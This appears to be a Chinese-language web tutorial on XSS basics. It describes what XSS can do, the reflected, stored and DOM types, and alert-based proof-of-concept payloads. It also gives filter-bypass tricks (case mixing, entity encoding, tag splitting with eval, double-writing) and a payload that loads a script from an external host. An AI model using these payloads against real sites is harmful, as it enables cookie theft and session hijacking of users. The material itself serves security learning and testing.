温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

XSS漏洞基础知识有哪些

发布时间:2021-12-10 09:21:00 来源:亿速云 阅读:193 作者:柒染 栏目:大数据

XSS漏洞基础知识有哪些,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

一、XSS漏洞危害

1、盗取各种用户账号

2、窃取用户cookie

3、劫持用户会话

4、刷流量,执行弹窗

二、漏洞验证

1、在登录框输入下面代码,点击登录

<script>alert(123)</script>

XSS漏洞基础知识有哪些

2、弹出对话框,说明存在xss漏洞

XSS漏洞基础知识有哪些

三、漏洞分类

1、反射型

只能利用一次,必须构造特殊的连接让目标点击,比如上面的登录界面。

2、存储型

将特殊语句存储到页面,只要目标浏览该网页,就会被攻击,比如留言板。

3、DOM型

不与服务器进行交互,利用在本地渲染网页时触发

四、payload构造

伪协议

<a href="javascript:alert(123)">aiyou</a>

事件

<img src="./1.jpg" onmouseover='alert(123)'><img src="#" onerror='alert(123)'><input type="text" onkeydown="alert(123)"><input type="button" onclick="alert(123)"><div style="width:expression(alert(xss))">

五、绕过防护

1、大小写绕过

<SCript>alert(123)</SCript>

2、引号的使用

<img src="#" onerror="alert(123)"/><img src='#' onerror='alert(123)'/><img src=# onerror=alert(123) />

3、“/”代替空格

<img/src='#'/Onerror='alert(123)'>

4、对标签属性值转码

字母    ASCII  十进制编码  十六进制编码

a        97         &#97;        &#x61;

<a href="j&#97;v&#x61script:alert(123)">aiyou</a>

5、头插入&#01;尾插入&#02;

<a href="&#01;j&#97;v&#x61script:alert(123)&#02;">aiyou</a>

6、拆分

<script>z='alert'</script><script>z=z+'(123)'</script><script>eval(z)</script>

7、双写绕过

<scrscriptipt>alert(123)</scscriptript>

六、外部调用

1、新建一个xss.js,内容为

alert(213);

2、构建paylaod,提交

<script src="http://192.168.1.129/js/xss.js"></script>

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

xss
AI